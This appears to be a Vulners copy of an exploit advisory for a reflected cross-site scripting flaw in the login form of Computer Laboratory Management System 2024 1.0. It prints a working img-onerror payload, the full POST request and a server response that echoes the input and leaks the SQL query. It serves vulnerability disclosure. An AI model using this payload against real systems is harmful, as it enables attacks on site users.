Vulners
Lucene search
Computer Laboratory Management System 2024 1.0 Cross Site Scripting
`## Titles: LMS2024-1.0 XSS-Reflected Information Disclosure
## Author: nu11secur1ty
## Date: 00/04/2024
## Vendor: https://github.com/oretnom23
## Software:
https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#google_vignette
## Reference: https://portswigger.net/web-security/cross-site-scripting
## Description:
The value of the username request parameter is copied into the HTML
document as plain text between tags. The payload ro2iz<img src=a
onerror=alert(1)>xggkt was submitted in the username parameter. This input
was echoed unmodified in the application's response.
STATUS: HIGH- Vulnerability
[+]Exploits:
- XSS-Reflected:
```xss
POST /php-lms/classes/Login.php?f=login HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/128.0.6613.138 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=g61goafu1miq2e737ra7dclqml
Origin: https://pwnedhost.com
X-Requested-With: XMLHttpRequest
Referer: https://pwnedhost.com/php-lms/admin/login.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128",
"Chromium";v="128"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 37
username=VLVAuyqjro2iz%3cimg%20src%3da%20onerror%3dalert(1)%3exggkt&password=e3I!x1c!Q7
```
+ [Response]
```
HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 08:27:39 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 177
Connection: close
Content-Type: text/html; charset=UTF-8
{"status":"incorrect","last_qry":"SELECT * from users where username =
'VLVAuyqjro2iz<img src=a onerror=alert(1)>xggkt' and password =
md5('45ec487cfe5b3bac8e61740ae8dbcd06') "}
```
## Reproduce:
[href](https://www.patreon.com/nu11secur1ty)
## Demo PoC:
[href](https://www.patreon.com/nu11secur1ty)
## Time spent:
00:27:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Oct 2024 00:00Current
7.4High risk
Vulners AI Score7.4